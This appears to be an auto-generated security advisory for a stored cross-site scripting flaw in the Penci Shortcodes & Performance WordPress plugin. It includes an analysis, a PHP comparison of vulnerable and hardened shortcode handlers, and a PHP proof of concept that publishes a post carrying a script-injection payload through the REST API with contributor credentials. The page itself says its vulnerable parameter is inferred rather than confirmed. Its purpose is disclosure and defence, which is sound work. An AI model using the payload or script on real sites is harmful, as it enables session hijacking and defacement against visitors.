Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2026-24354: Penci Shortcodes & Performance <= 6.1 – Authenticated (Contributor+) Stored Cross-Site Scripting (penci-shortcodes)

Severity Medium (CVSS 6.4)
CWE 79
Vulnerable Version 6.1
Patched Version
Disclosed January 9, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-24354 (metadata-based):
This vulnerability is an authenticated stored cross-site scripting (XSS) flaw in the Penci Shortcodes & Performance WordPress plugin, affecting versions up to and including 6.1. The vulnerability allows users with contributor-level permissions or higher to inject arbitrary JavaScript into site pages, which then executes for any visitor viewing the compromised content. The CVSS score of 6.4 (Medium) reflects its network-based attack vector, low attack complexity, and requirement for low-privilege authentication, with scope change and impacts on confidentiality and integrity.

Atomic Edge research infers the root cause is insufficient input sanitization and output escaping, as indicated by the CWE-79 classification and the vulnerability description. The plugin likely fails to properly validate or escape user-supplied input within one of its shortcode handlers or content processing functions before storing it in the database. This inference is based on the plugin’s purpose of providing shortcodes and the stored nature of the attack. The exact vulnerable code path is not confirmed without source code analysis.

Exploitation requires an attacker to possess a WordPress account with at least contributor-level privileges. The attacker would likely inject a malicious script payload into post or page content via a plugin shortcode parameter, a custom field, or a content block processed by the plugin. A typical payload might be `alert(document.cookie)` or a more sophisticated script to steal session cookies. The malicious content is saved when the post is drafted or published. The script executes in the browsers of all users who later view the affected page.

Effective remediation requires implementing proper input validation and output escaping. The patched version 6.2 likely added calls to WordPress sanitization functions like `sanitize_text_field()` or `wp_kses()` on user input before storage. It also likely added output escaping functions like `esc_html()` or `esc_attr()` when rendering shortcode attributes or other dynamic content. A comprehensive fix must ensure all user-controllable data is treated as untrusted at both input and output stages.
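The root-cause and remediation paragraphs above name the WordPress functions but not where each belongs in a shortcode handler. The following PHP is an added example, not Atomic Edge's code and not the plugin's source: the `[penci_box]` shortcode, its `custom` and `title` attributes, and both handler bodies are assumptions. It places the unsafe shape the analysis infers next to a hardened handler that escapes every value for the context it lands in, and it runs outside WordPress through stand-in functions so the two renderings can be compared with `php`.

```php
<?php
// Added example (not Atomic Edge's code and not the plugin's source): a
// hypothetical [penci_box] shortcode handler in the unsafe shape inferred
// above, beside a hardened version. Inside WordPress the real
// shortcode_atts()/esc_attr()/esc_html()/wp_kses_post() are used; outside
// it, the stand-ins below let the file run with `php` for demonstration only.

if (!function_exists('shortcode_atts')) {
    // Stand-in: keep only attributes that have a declared default.
    function shortcode_atts(array $pairs, $atts, $shortcode = '') {
        $out = [];
        foreach ($pairs as $name => $default) {
            $out[$name] = array_key_exists($name, (array) $atts) ? $atts[$name] : $default;
        }
        return $out;
    }
}
if (!function_exists('esc_attr')) {
    // Stand-in approximating esc_attr(): encode for an HTML attribute context.
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('esc_html')) {
    // Stand-in approximating esc_html(): encode for an HTML text context.
    function esc_html($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}
if (!function_exists('wp_kses_post')) {
    // Stand-in that is stricter than the real wp_kses_post(): it drops every
    // tag, whereas WordPress keeps its post-safe allowlist (p, a, strong, ...)
    // and removes only disallowed tags and attributes such as event handlers.
    function wp_kses_post($text) {
        return strip_tags((string) $text);
    }
}

// Unsafe handler: the attribute and inner content are concatenated verbatim
// into HTML, so a contributor-controlled value can close the quoted
// attribute early and inject markup.
function penci_box_vulnerable($atts, $content = '') {
    $atts = shortcode_atts(['custom' => '', 'title' => ''], $atts, 'penci_box');
    return '<div class="penci-box" data-custom="' . $atts['custom'] . '">'
         . '<h3>' . $atts['title'] . '</h3>'
         . $content
         . '</div>';
}

// Hardened handler: escape each value at output time for the context it
// lands in. Attribute values get esc_attr(), text nodes get esc_html(), and
// nested markup is reduced to the post-safe allowlist with wp_kses_post().
function penci_box_hardened($atts, $content = '') {
    $atts = shortcode_atts(['custom' => '', 'title' => ''], $atts, 'penci_box');
    return '<div class="penci-box" data-custom="' . esc_attr($atts['custom']) . '">'
         . '<h3>' . esc_html($atts['title']) . '</h3>'
         . wp_kses_post($content)
         . '</div>';
}

if (function_exists('add_shortcode')) {
    // Inside WordPress: register only the hardened handler.
    add_shortcode('penci_box', 'penci_box_hardened');
} else {
    // Offline demonstration with constructed values shaped like the PoC payload.
    $atts    = ['custom' => '"><script>alert(1)</script>', 'title' => 'Box <b>title</b>'];
    $content = 'Hello <img src=x onerror="alert(1)">';

    $unsafe = penci_box_vulnerable($atts, $content);
    $safe   = penci_box_hardened($atts, $content);

    echo "Unsafe output:\n{$unsafe}\n\n";
    echo "Hardened output:\n{$safe}\n\n";

    // Self-check: the hardened output carries no raw <script> tag and no
    // event-handler attribute; the injected quote stays encoded as &quot;.
    $ok = strpos($safe, '<script') === false && strpos($safe, 'onerror=') === false;
    echo $ok ? "[+] Hardened handler neutralised the constructed payload\n"
             : "[-] Unexpected: payload survived\n";
}
```

Running the file with `php` outside WordPress prints both renderings; the unsafe one shows the `data-custom` attribute terminated by the injected quote, the hardened one shows the same bytes encoded in place. One caveat worth keeping in mind when triaging this class of bug: for a contributor without the `unfiltered_html` capability, WordPress core already passes post content through kses at save time, so the exposure in shortcode plugins is usually an attribute value that the handler interpolates into markup unescaped rather than a bare `<script>` tag in the post body. Escaping at output in the handler closes that path regardless of what reached the database.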

Successful exploitation leads to client-side code execution in the context of the vulnerable site. Attackers can hijack user sessions, deface websites, perform actions on behalf of authenticated users, or redirect visitors to malicious sites. The impact is amplified because the payload is stored persistently and executes for every page view. Contributor-level access is relatively easy to obtain, increasing the practical risk for sites with open user registration or compromised accounts.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-24354 - Penci Shortcodes & Performance <= 6.1 - Authenticated (Contributor+) Stored Cross-Site Scripting
/**
 * Proof-of-concept for stored XSS in Penci Shortcodes & Performance plugin.
 * This script simulates an authenticated contributor submitting a post containing a malicious shortcode payload.
 * The exact vulnerable shortcode parameter is inferred from the plugin's functionality and CWE.
 * Assumptions:
 * 1. The target site has the vulnerable plugin (<=6.1) installed.
 * 2. The attacker has valid contributor-level credentials.
 * 3. The plugin has a shortcode that insecurely outputs an attribute without escaping.
 * 4. The WordPress REST API is available for post creation.
 */

$target_url = 'https://target-site.com'; // CHANGE THIS
$username = 'contributor_user'; // CHANGE THIS
$password = 'contributor_pass'; // CHANGE THIS

// Payload: A simple alert to demonstrate script execution.
// In a real attack, this would be a script to steal cookies or session tokens.
$xss_payload = '"><script>alert(`Atomic Edge XSS Test: ${document.domain}`)</script>';

// Simulate a post containing a malicious shortcode.
// The plugin slug 'penci-shortcodes' suggests shortcodes like [penci_something].
// We assume a shortcode with a vulnerable 'title' or 'custom' attribute.
$malicious_content = "This is a test post with an exploited shortcode.\n\n[penci_box custom=\"{$xss_payload}\"]Malicious content here[/penci_box]";

$api_endpoint = $target_url . '/wp-json/wp/v2/posts';

// Step 1: Authenticate to get a nonce or REST API authentication token.
// For REST API, we use Basic Auth for simplicity in PoC. Real sites may use cookies or JWT.
$auth_header = 'Authorization: Basic ' . base64_encode($username . ':' . $password);

// Step 2: Create a new post as a contributor with the malicious content.
$ch = curl_init();
curl_setopt_array($ch, [
    CURLOPT_URL => $api_endpoint,
    CURLOPT_RETURNTRANSFER => true,
    CURLOPT_POST => true,
    CURLOPT_HTTPHEADER => [
        'Content-Type: application/json',
        $auth_header
    ],
    CURLOPT_POSTFIELDS => json_encode([
        'title' => 'Test Post - CVE-2026-24354',
        'content' => $malicious_content,
        'status' => 'publish' // Contributor can publish if they have permission, otherwise use 'draft'.
    ])
]);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code >= 200 && $http_code < 300) {
    $resp_data = json_decode($response, true);
    $post_id = $resp_data['id'] ?? 'unknown';
    $post_url = $resp_data['link'] ?? $api_endpoint . '/' . $post_id;
    echo "[+] Post created successfully. ID: {$post_id}\n";
    echo "[+] Visit the post to trigger XSS: {$post_url}\n";
} else {
    echo "[-] Post creation failed. HTTP Code: {$http_code}\n";
    echo "[-] Response: {$response}\n";
    echo "[*] Note: Contributor may need to save as 'draft'. Adjust the 'status' parameter if needed.\n";
}
?>
